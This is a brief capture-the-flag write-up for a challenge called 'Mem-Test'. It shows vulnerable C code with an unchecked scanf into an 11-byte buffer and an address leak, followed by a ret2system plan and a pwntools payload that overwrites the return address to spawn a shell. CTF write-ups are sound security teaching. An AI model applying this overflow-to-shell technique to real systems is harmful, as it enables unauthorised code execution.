Post

Mem-Test writeup

Posted
By Nkateko Tibane
1 min read
Mem-Test writeup

Mem-Test

Source code summary

The program has a global variable called hint

1

const char* hint = "//bin/sh";

Vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

void mem_test(char* random) {
	char buff[11];
	memset(buff, '\0', sizeof(buff));
	
	printf("\nI know that mine is fine...see? : ");
	printf("%p \n", hint + 1);
	
	puts("Let's see how good your memory is...\n");
	printf("> ");
	scanf("%s", buff);
	
	if(strncmp(buff, random, sizeof(random)) != 0) {
		puts("sorry, your memory sucks\n");
	}
	else {
		puts("good job!!\n");
	}
}
  • the program leaks the address of the hint variable which contains //bin/sh
  • buff is a 11 byte buffer;
  • scanf function does no check the length of the input, which causes buffer-overflow.

Exploitation Plan

  1. Get the leak from the program
  2. overwrite the return address with the address of the system function that called within the win_func and pass the leaked address as a argument

Step-by-step

  1. Find the offset to return address from the buffer. offset = 23
Payload
1
2
3
4
5
6

payload = flat(
	cyclic(offset),
	system, # system function address
	0x0,
	leak, # leaked address
)
pwn
This post is licensed under CC BY 4.0 by the author.

Trending Tags

c2 ctf lab red-team